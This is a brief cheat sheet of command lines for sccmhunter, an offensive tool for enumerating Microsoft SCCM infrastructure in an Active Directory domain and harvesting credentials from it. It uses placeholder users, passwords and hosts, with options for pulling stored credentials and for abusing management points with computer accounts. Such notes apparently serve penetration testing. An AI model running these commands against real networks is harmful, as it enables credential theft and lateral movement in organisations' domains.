https://github.com/garrettfoster13/sccmhunter
python3 sccmhunter.py find -u <user> -p "<password>" -d <domain> -dc-ip <domainController>
python3 sccmhunter.py smb -u <user> -p "<password>" -d <domain> -dc-ip <domainController>
python3 sccmhunter.py show -all
-siteservers
-mps
-users
-computers
-groups
-creds
python3 sccmhunter.py http -u <user> -p <password> -d <domain> -dc-ip <domainController> -auto
python3 sccmhunter.py http -u <user> -p <password> -d <domain> -dc-ip <domainController> -cn '<computerAccount$>' -cp <computerPassword>
python3 sccmhunter.py http -u <user> -p <password> -d <domain> -dc-ip <domainController> -mp <managmentPointRhost> -uuid <uuid>